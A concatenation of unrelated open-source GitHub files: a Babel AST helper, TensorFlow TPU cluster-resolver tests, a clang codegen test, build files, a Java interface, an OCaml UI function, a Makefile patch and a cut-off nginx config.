/** * Check if the input `node` is a reference to a bound variable. 
*/ function isReferenced(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { switch (parent.type) { // yes: PARENT[NODE] // yes: NODE.child // no: parent.NODE case "MemberExpression": case "JSXMemberExpression": case "BindExpression": if (parent.property === node && parent.computed) { return true; } else if (parent.object === node) { return true; } else { return false; } // no: new.NODE // no: NODE.target case "MetaProperty": return false; // yes: { [NODE]: "" } // yes: { NODE } // no: { NODE: "" } case "ObjectProperty": if (parent.key === node) { return parent.computed; } // no: let NODE = init; // yes: let id = NODE; case "VariableDeclarator": return parent.id !== node; // no: function NODE() {} // no: function foo(NODE) {} case "ArrowFunctionExpression": case "FunctionDeclaration": case "FunctionExpression": for (var _iterator = (parent.params /*: Array*/), _isArray = Array.isArray(_iterator), _i = 0, _iterator = _isArray ? _iterator : _getIterator(_iterator);;) { var _ref; if (_isArray) { if (_i >= _iterator.length) break; _ref = _iterator[_i++]; } else { _i = _iterator.next(); if (_i.done) break; _ref = _i.value; } var param = _ref; if (param === node) return false; } return parent.id !== node; // no: export { foo as NODE }; // yes: export { NODE as foo }; // no: export { NODE as foo } from "foo"; case "ExportSpecifier": if (parent.source) { return false; } else { return parent.local === node; } // no: export NODE from "foo"; // no: export * as NODE from "foo"; case "ExportNamespaceSpecifier": case "ExportDefaultSpecifier": return false; // no: <div NODE="foo" /> case "JSXAttribute": return parent.name !== node; // no: class { NODE = value; } // yes: class { key = NODE; } case "ClassProperty": return parent.value === node; // no: import NODE from "foo"; // no: import * as NODE from "foo"; // no: import { NODE as foo } from "foo"; // no: import { foo as NODE } from "foo"; // no: import NODE from "bar"; case "ImportDefaultSpecifier": case 
"ImportNamespaceSpecifier": case "ImportSpecifier": return false; // no: class NODE {} case "ClassDeclaration": case "ClassExpression": return parent.id !== node; // yes: class { [NODE](){} } case "ClassMethod": case "ObjectMethod": return parent.key === node && parent.computed; // no: NODE: for (;;) {} case "LabeledStatement": return false; // no: try {} catch (NODE) {} case "CatchClause": return parent.param !== node; // no: function foo(...NODE) {} case "RestElement": return false; // yes: left = NODE; // no: NODE = right; case "AssignmentExpression": return parent.right === node; // no: [NODE = foo] = []; // yes: [foo = NODE] = []; case "AssignmentPattern": return parent.right === node; // no: [NODE] = []; // no: ({ NODE }) = []; case "ObjectPattern": case "ArrayPattern": return false; } return true; } /** * Check if the input `name` is a valid identifier name * and isn't a reserved word. */ function isValidIdentifier(name /*: string*/) /*: boolean*/ { if (typeof name !== "string" || _esutils2["default"].keyword.isReservedWordES6(name, true)) { return false; } else { return _esutils2["default"].keyword.isIdentifierNameES6(name); } } /** * Check if the input `node` is a `let` variable declaration. */ function isLet(node /*: Object*/) /*: boolean*/ { return t.isVariableDeclaration(node) && (node.kind !== "var" || node[_constants.BLOCK_SCOPED_SYMBOL]); } /** * Check if the input `node` is block scoped. */ function isBlockScoped(node /*: Object*/) /*: boolean*/ { return t.isFunctionDeclaration(node) || t.isClassDeclaration(node) || t.isLet(node); } /** * Check if the input `node` is a variable declaration. */ function isVar(node /*: Object*/) /*: boolean*/ { return t.isVariableDeclaration(node, { kind: "var" }) && !node[_constants.BLOCK_SCOPED_SYMBOL]; } /** * Check if the input `specifier` is a `default` import or export. 
*/ function isSpecifierDefault(specifier /*: Object*/) /*: boolean*/ { return t.isImportDefaultSpecifier(specifier) || t.isIdentifier(specifier.imported || specifier.exported, { name: "default" }); } /** * Check if the input `node` is a scope. */ function isScope(node /*: Object*/, parent /*: Object*/) /*: boolean*/ { if (t.isBlockStatement(node) && t.isFunction(parent, { body: node })) { return false; } return t.isScopable(node); } /** * Check if the input `node` is definitely immutable. */ function isImmutable(node /*: Object*/) /*: boolean*/ { if (t.isType(node.type, "Immutable")) return true; if (t.isIdentifier(node)) { if (node.name === "undefined") { // immutable! return true; } else { // no idea... return false; } } return false; }
{ "pile_set_name": "Github" }
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for TPUClusterResolver.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import six from six.moves.urllib.error import URLError from tensorflow.python import framework from tensorflow.python.client import session from tensorflow.python.distribute.cluster_resolver.tpu import tpu_cluster_resolver as resolver from tensorflow.python.eager.context import LogicalDevice from tensorflow.python.framework import errors from tensorflow.python.framework import test_util from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging as logging from tensorflow.python.training import server_lib from tensorflow.python.util import compat mock = test.mock try: from cloud_tpu_client import client # pylint: disable=g-import-not-at-top except ImportError: logging.debug( 'Falling back to TensorFlow client; we recommended you install the Cloud ' 'TPU client directly with pip install cloud-tpu-client.') from tensorflow.python.tpu.client import client # pylint: disable=g-import-not-at-top class MockRequestClass(object): def __init__(self, name, tpu_map): self._name = name self._tpu_map = tpu_map def execute(self): if self._name in self._tpu_map: return self._tpu_map[self._name] else: raise 
KeyError('Resource %s was not found' % self._name) class MockNodeClass(object): def __init__(self, tpu_map): self._tpu_map = tpu_map def get(self, name): return MockRequestClass(name, self._tpu_map) def mock_request_compute_metadata(*args, **kwargs): del kwargs # Unused. if args[0] == 'project/project-id': return 'test-project' elif args[0] == 'instance/zone': return 'projects/test-project/locations/us-central1-c' elif args[0] == 'instance/network-interfaces/0/ip': return '10.128.1.2' return '' def mock_is_running_in_gce(): return True def mock_is_not_running_in_gce(): return False def mock_running_in_gce_urlopen(cls, *args, **kwargs): del cls, args, kwargs # Unused. mock_response = mock.MagicMock() mock_response.info.return_value = {'Metadata-Flavor': 'Google'} return mock_response def mock_not_running_in_gce_urlopen(cls, *args, **kwargs): del cls, args, kwargs # Unused. raise URLError(reason='Host does not exist.') @test_util.run_all_in_graph_and_eager_modes class TPUClusterResolverTest(test.TestCase): def _verifyClusterSpecEquality(self, cluster_spec, expected_proto): """Verifies that the ClusterSpec generates the correct proto. We are testing this four different ways to ensure that the ClusterSpec returned by the TPUClusterResolver behaves identically to a normal ClusterSpec when passed into the generic ClusterSpec libraries. 
Args: cluster_spec: ClusterSpec returned by the TPUClusterResolver expected_proto: Expected protobuf """ self.assertProtoEquals(expected_proto, cluster_spec.as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec).as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec.as_cluster_def()).as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec.as_dict()).as_cluster_def()) def mock_service_client(self, tpu_map=None): if tpu_map is None: tpu_map = {} mock_locations = mock.MagicMock() mock_locations.nodes.return_value = MockNodeClass(tpu_map) mock_project = mock.MagicMock() mock_project.locations.return_value = mock_locations mock_client = mock.MagicMock() mock_client.projects.return_value = mock_project return mock_client @mock.patch.object(resolver, 'is_running_in_gce', mock_is_running_in_gce) def testCheckRunningInGceWithNoTpuName(self): with self.assertRaisesRegex(ValueError, 'Please provide a TPU Name to connect to.*'): resolver.TPUClusterResolver(tpu='') @mock.patch.object(six.moves.urllib.request, 'urlopen', mock_running_in_gce_urlopen) def testIsRunningInGce(self): self.assertTrue(resolver.is_running_in_gce()) @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testRetrieveProjectAndZoneFromMetadata(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu=['test-tpu-1'], credentials=None, service=self.mock_service_client(tpu_map=tpu_map), coordinator_name='coordinator') actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' tasks { key: 0 value: '10.128.1.2:%s' } } job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ % cluster_resolver._coordinator_port 
self._verifyClusterSpecEquality(actual_cluster_spec, str(expected_proto)) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testRetrieveProjectAndZoneFromMetadataNoCoordinator(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu=['test-tpu-1'], coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testNotReadyCloudTpu(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'CREATING' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) with self.assertRaises(RuntimeError): cluster_resolver.cluster_spec() def testSimpleSuccessfulRetrieval(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=['test-tpu-1'], coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' 
tasks { key: 0 value: '10.128.1.5:10203' } } job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') def testFailedMetadata(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='nonexistent-tpu', coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) with self.assertRaises(ValueError) as context: cluster_resolver.cluster_spec() self.assertIn('Could not lookup TPU metadata', str(context.exception)) def testNewNetworkEndpointFormat(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [{ 'ipAddress': '10.2.3.4', 'port': 8470, }] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' tasks { key: 0 value: '10.128.1.5:10203' } } job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual('grpc://10.2.3.4:8470', cluster_resolver.master()) @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testPodResolution(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 
8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( tpu='test-tpu-1', credentials=None, service=self.mock_service_client(tpu_map=tpu_map), coordinator_name='coordinator') actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator', tasks { key: 0 value: '10.128.1.2:%s'} } job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } tasks { key: 1 value: '10.2.3.5:8470' } tasks { key: 2 value: '10.2.3.6:8470' } tasks { key: 3 value: '10.2.3.7:8470' } } """ % cluster_resolver._coordinator_port self._verifyClusterSpecEquality(actual_cluster_spec, str(expected_proto)) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') def testPodResolutionNoCoordinator(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } tasks { key: 1 value: '10.2.3.5:8470' } tasks { key: 2 value: '10.2.3.6:8470' } tasks { key: 3 value: '10.2.3.7:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') def testGetMasterNoEntries(self): tpu_map = {} with self.assertRaises(ValueError): resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=[], coordinator_name=None, credentials=None, 
service=self.mock_service_client(tpu_map=tpu_map)) # TODO(saeta): Convert to parameterized test when included in OSS TF. def verifyShouldResolve(self, tpu, should_resolve): cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=tpu, coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map={})) self.assertEqual(should_resolve, cluster_resolver._cloud_tpu_client.api_available(), "TPU: '%s'" % tpu) def testShouldResolveGrpc(self): self.verifyShouldResolve('grpc://10.1.2.3:8470', False) def testShouldResolveName(self): self.verifyShouldResolve('mytpu', True) def testShouldResolveList(self): self.verifyShouldResolve(['myothertpu'], True) def testShouldResolveGrpcPrefix(self): self.verifyShouldResolve('grpctpu', True) def testNoCallComputeMetadata(self): cluster_resolver = resolver.TPUClusterResolver(tpu='grpc://10.1.2.3:8470') self.assertEqual('grpc://10.1.2.3:8470', cluster_resolver.master()) self.assertEqual( server_lib.ClusterSpec({ 'worker': ['10.1.2.3:8470'] }).as_dict(), cluster_resolver.cluster_spec().as_dict()) def testGkeEnvironmentForDonut(self): os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] = 'grpc://10.120.27.5:8470' self.assertIn('KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS', os.environ) cluster_resolver = resolver.TPUClusterResolver() self.assertEqual( compat.as_bytes('grpc://10.120.27.5:8470'), compat.as_bytes(cluster_resolver.master())) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.120.27.5:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) del os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] def testGkeEnvironmentForPod(self): os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] = ('grpc://10.120.27.5:8470,' 'grpc://10.120.27.6:8470,' 'grpc://10.120.27.7:8470,' 'grpc://10.120.27.8:8470') self.assertIn('KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS', os.environ) cluster_resolver = resolver.TPUClusterResolver() 
self.assertEqual( compat.as_bytes('grpc://10.120.27.5:8470'), compat.as_bytes(cluster_resolver.master())) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.120.27.5:8470' } tasks { key: 1 value: '10.120.27.6:8470' } tasks { key: 2 value: '10.120.27.7:8470' } tasks { key: 3 value: '10.120.27.8:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) del os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] def testRpcDetectionForGrpcString(self): cluster_resolver = resolver.TPUClusterResolver( tpu='grpc://10.1.2.3:8470') self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') def testOverrideTaskTypeAndIndexAndGetMaster(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') cluster_resolver.task_type = 'worker' cluster_resolver.task_id = 3 self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.7:8470') def testGetDeviceDictAndCoresWithTPUs(self): devices = [ '/job:tpu_worker/task:0/device:TPU:0', '/job:tpu_worker/task:1/device:TPU:1', '/job:tpu_worker/task:2/device:TPU:0', '/job:tpu_worker/task:3/device:TPU:1', '/job:tpu_worker/task:0/device:TPU:4', '/job:tpu_worker/task:1/device:TPU:5', '/job:tpu_worker/task:2/device:TPU:4', '/job:tpu_worker/task:3/device:TPU:5', ] device_list = [ session._DeviceAttributes(name, 'TPU', 1024, 0) for name in devices ] device_details = resolver.TPUClusterResolver._get_device_dict_and_cores( 
device_list) self.assertEqual(device_details.total_cores, 8) self.assertEqual(device_details.device_map, {'0': ['0', '4'], '1': ['1', '5'], '2': ['0', '4'], '3': ['1', '5']}) def testGetDeviceDictAndCoresWithCPUsAndGPUs(self): devices = [ '/job:tpu_worker/task:0/device:CPU:0', '/job:tpu_worker/task:1/device:CPU:0', '/job:tpu_worker/task:2/device:CPU:0', '/job:tpu_worker/task:3/device:CPU:0', '/job:tpu_worker/task:0/device:GPU:1', '/job:tpu_worker/task:1/device:GPU:1', '/job:tpu_worker/task:2/device:GPU:1', '/job:tpu_worker/task:3/device:GPU:1', ] device_list = [ session._DeviceAttributes(name, 'XLA', 1024, 0) for name in devices ] device_dict, num_cores =\ resolver.TPUClusterResolver._get_device_dict_and_cores(device_list) self.assertEqual(num_cores, 0) self.assertEqual(device_dict, {}) def testVerifySameCoreCount(self): self.assertEqual( resolver.TPUClusterResolver ._verify_and_return_same_core_count({0: [0, 1, 2, 3, 4, 5, 6, 7]}), 8) self.assertEqual( resolver.TPUClusterResolver ._verify_and_return_same_core_count({ 0: [0, 1], 1: [2, 3] }), 2) with self.assertRaises(RuntimeError): resolver.TPUClusterResolver._verify_and_return_same_core_count( { 0: [0], 1: [1, 2] }) @mock.patch.object(framework.config, 'list_logical_devices') @mock.patch.object(session.BaseSession, 'list_devices') @mock.patch.object(resolver, 'is_running_in_gce', mock_is_not_running_in_gce) def testNumAcceleratorsSuccess(self, mock_list_devices, mock_eager_list_devices): devices = [ LogicalDevice('/job:tpu_worker/task:0/device:TPU:0', 'TPU'), LogicalDevice('/job:tpu_worker/task:1/device:TPU:1', 'TPU'), LogicalDevice('/job:tpu_worker/task:2/device:TPU:0', 'TPU'), LogicalDevice('/job:tpu_worker/task:3/device:TPU:1', 'TPU'), LogicalDevice('/job:tpu_worker/task:0/device:TPU:4', 'TPU'), LogicalDevice('/job:tpu_worker/task:1/device:TPU:5', 'TPU'), LogicalDevice('/job:tpu_worker/task:2/device:TPU:4', 'TPU'), LogicalDevice('/job:tpu_worker/task:3/device:TPU:5', 'TPU'), ] device_list = [ 
session._DeviceAttributes(d.name, d.device_type, 1024, 0) for d in devices ] mock_eager_list_devices.return_value = devices mock_list_devices.return_value = device_list tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', service=self.mock_service_client(tpu_map=tpu_map)) self.assertEqual(cluster_resolver.num_accelerators(), {'TPU': 2}) @mock.patch.object(framework.config, 'list_logical_devices') @mock.patch.object(session.BaseSession, 'list_devices') @mock.patch.object(resolver, 'is_running_in_gce', mock_is_not_running_in_gce) def testNumAcceleratorsRetryFailure(self, mock_list_devices, mock_eager_list_devices): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', service=self.mock_service_client(tpu_map=tpu_map)) mock_list_devices.side_effect = errors.DeadlineExceededError( None, None, 'timeout') mock_eager_list_devices.side_effect = errors.DeadlineExceededError( None, None, 'timeout') with self.assertRaises(RuntimeError): cluster_resolver.num_accelerators() def testLocalTpuResolver(self): cr = resolver.TPUClusterResolver(tpu='local') self.assertEqual(cr.get_master(), '') if __name__ == '__main__': test.main()
{ "pile_set_name": "Github" }
// RUN: %clang_cc1 -triple x86_64-apple-darwin -std=c++11 -emit-llvm %s -o - | FileCheck %s struct A { A(const A&); A(); ~A(); }; struct B : public A { B(); B(const B& Other); ~B(); }; struct C : public B { C(); C(const C& Other); ~C(); }; struct X { operator B&(); operator C&(); X(const X&); X(); ~X(); B b; C c; }; void test0_helper(A); void test0(X x) { test0_helper(x); // CHECK-LABEL: define void @_Z5test01X( // CHECK: [[TMP:%.*]] = alloca [[A:%.*]], align // CHECK-NEXT: [[T0:%.*]] = call dereferenceable({{[0-9]+}}) [[B:%.*]]* @_ZN1XcvR1BEv( // CHECK-NEXT: [[T1:%.*]] = bitcast [[B]]* [[T0]] to [[A]]* // CHECK-NEXT: call void @_ZN1AC1ERKS_([[A]]* [[TMP]], [[A]]* dereferenceable({{[0-9]+}}) [[T1]]) // CHECK-NEXT: call void @_Z12test0_helper1A([[A]]* [[TMP]]) // CHECK-NEXT: call void @_ZN1AD1Ev([[A]]* [[TMP]]) // CHECK-NEXT: ret void } struct Base; struct Root { operator Base&(); }; struct Derived; struct Base : Root { Base(const Base &); Base(); operator Derived &(); }; struct Derived : Base { }; void test1_helper(Base); void test1(Derived bb) { // CHECK-LABEL: define void @_Z5test17Derived( // CHECK-NOT: call {{.*}} @_ZN4BasecvR7DerivedEv( // CHECK: call void @_ZN4BaseC1ERKS_( // CHECK-NOT: call {{.*}} @_ZN4BasecvR7DerivedEv( // CHECK: call void @_Z12test1_helper4Base( test1_helper(bb); } // Don't crash after devirtualizing a derived-to-base conversion // to an empty base allocated at offset zero. // rdar://problem/11993704 class Test2a {}; class Test2b final : public virtual Test2a {}; void test2(Test2b &x) { Test2a &y = x; // CHECK-LABEL: define void @_Z5test2R6Test2b( // CHECK: [[X:%.*]] = alloca [[B:%.*]]*, align 8 // CHECK-NEXT: [[Y:%.*]] = alloca [[A:%.*]]*, align 8 // CHECK-NEXT: store [[B]]* {{%.*}}, [[B]]** [[X]], align 8 // CHECK-NEXT: [[T0:%.*]] = load [[B]]*, [[B]]** [[X]], align 8 // CHECK-NEXT: [[T1:%.*]] = bitcast [[B]]* [[T0]] to [[A]]* // CHECK-NEXT: store [[A]]* [[T1]], [[A]]** [[Y]], align 8 // CHECK-NEXT: ret void }
{ "pile_set_name": "Github" }
# Automake fragment for the WSF/C "notify" sample program.
# The binary is installed under $(prefix)/samples/bin.
prgbindir=$(prefix)/samples/bin
prgbin_PROGRAMS = notify
notify_SOURCES = notify.cpp

# Link against the bundled Axis2/C libtool archives (util, AXIOM, engine,
# Guththila parser, HTTP sender/receiver transports) and the WSF core
# library, plus whatever $(GUTHTHILA_LIBS)/$(LIBXML2_LIBS) configure found.
notify_LDADD = $(LDFLAGS) \
	../../../wsf_c/axis2c/util/src/libaxutil.la \
	../../../wsf_c/axis2c/axiom/src/om/libaxis2_axiom.la \
	../../../wsf_c/axis2c/src/core/engine/libaxis2_engine.la \
	../../../wsf_c/axis2c/axiom/src/parser/guththila/libaxis2_parser.la \
	../../../wsf_c/axis2c/src/core/transport/http/sender/libaxis2_http_sender.la \
	../../../wsf_c/axis2c/src/core/transport/http/receiver/libaxis2_http_receiver.la \
	../../../src/main/libwso2_wsf.la \
	$(GUTHTHILA_LIBS) \
	$(LIBXML2_LIBS)

# Header search paths into the bundled wsf_c sub-projects
# (Axis2/C, Rampart/C, Sandesha2/C, Savan/C).
INCLUDES = -I../../../include \
	-I ../../../wsf_c/axis2c/include \
	-I ../../../wsf_c/axis2c/neethi/include \
	-I ../../../wsf_c/axis2c/axiom/include \
	-I ../../../wsf_c/axis2c/util/include \
	-I ../../../wsf_c/axis2c/util/include/platforms \
	-I ../../../wsf_c/rampartc/include \
	-I ../../../wsf_c/sandesha2c/include \
	-I ../../../wsf_c/savanc/include
{ "pile_set_name": "Github" }
/*
 *
 *
 * Copyright 1990-2009 Sun Microsystems, Inc. All Rights Reserved.
 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License version
 * 2 only, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License version 2 for more details (a copy is
 * included at /legal/license.txt).
 *
 * You should have received a copy of the GNU General Public License
 * version 2 along with this work; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
 * 02110-1301 USA
 *
 * Please contact Sun Microsystems, Inc., 4150 Network Circle, Santa
 * Clara, CA 95054 or visit www.sun.com if you need additional
 * information or have any questions.
 */

package javax.microedition.content;

/**
 * A <code>RequestListener</code> interface to be notified when an
 * Invocation request is available. A listener is set with
 * {@link ContentHandlerServer#setListener ContentHandlerServer.setListener};
 * the registered listener is called back once per newly available request.
 */
public interface RequestListener {

    /**
     * The listener is notified to indicate that a new Invocation
     * request is available on the given server.
     *
     * @param handler the ContentHandlerServer with a new request
     */
    void invocationRequestNotify(ContentHandlerServer handler);
}
{ "pile_set_name": "Github" }
(*s: ui_layers.ml *)
(*s: Facebook copyright *)
(* Yoann Padioleau
 *
 * Copyright (C) 2010-2012 Facebook
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public License
 * version 2.1 as published by the Free Software Foundation, with the
 * special exception on linking described in file license.txt.
 *
 * This library is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the file
 * license.txt for more details.
 *)
(*e: Facebook copyright *)
open Common

open Model2
module M = Model2
module Controller = Controller2
module L = Layer_code

(*****************************************************************************)
(* Prelude *)
(*****************************************************************************)

(* Rebuild the drawing with a (possibly different) selected layer and
 * trigger a repaint.
 *
 * [layer_title_opt]: [Some title] selects the layer whose [L.title]
 * matches; [None] selects no layer. Each existing layer is paired with
 * a boolean flag — true only for the matching layer; presumably this is
 * the "active" flag consumed by [Layer_code.build_index_of_layers]
 * (TODO confirm against its definition).
 *)
let choose_layer ~root layer_title_opt w =
  pr2 "choose_layer()";  (* debug trace *)
  let dw = w.dw in
  (* the layers currently attached to the drawing, dropping their old flags *)
  let original_layers = dw.M.layers.L.layers +> List.map fst in
  let layers_idx =
    Layer_code.build_index_of_layers ~root
      (original_layers +> List.map (fun layer ->
        layer,
        match layer_title_opt with
        | None -> false
        | Some title -> title =$= layer.L.title
      ))
  in
  (* replace the drawing wholesale, preserving its pixel dimensions *)
  w.dw <- Model2.init_drawing ~width:dw.width ~height:dw.height
    w.treemap_func layers_idx [root] root;
  View_mainmap.paint w.dw w.model;
  (* refresh the drawing area and the legend widgets *)
  !Controller._refresh_da ();
  !Controller._refresh_legend ();
  ()
(*e: ui_layers.ml *)
{ "pile_set_name": "Github" }
Makefile: Don't call "ln" directly Signed-off-by: Vicente Olivert Riera <[email protected]> --- keyutils-1.5.9/Makefile.orig 2014-09-22 16:05:14.117007430 +0100 +++ keyutils-1.5.9/Makefile 2014-09-22 16:06:26.053219336 +0100 @@ -123,10 +123,10 @@ endif ifeq ($(NO_SOLIB),0) all: $(DEVELLIB) $(DEVELLIB): $(SONAME) - ln -sf $< $@ + $(LNS) $< $@ $(SONAME): $(LIBNAME) - ln -sf $< $@ + $(LNS) $< $@ LIBVERS := -shared -Wl,-soname,$(SONAME) -Wl,--version-script,version.lds
{ "pile_set_name": "Github" }
{ "name": "autotest", "version": "1.0.0" }
{ "pile_set_name": "Github" }
# Minimal HTTP server: listens on port 8080 and answers every request
# with a fixed 200 greeting (no files are served from disk).
server{
    listen 8080;

    location / {
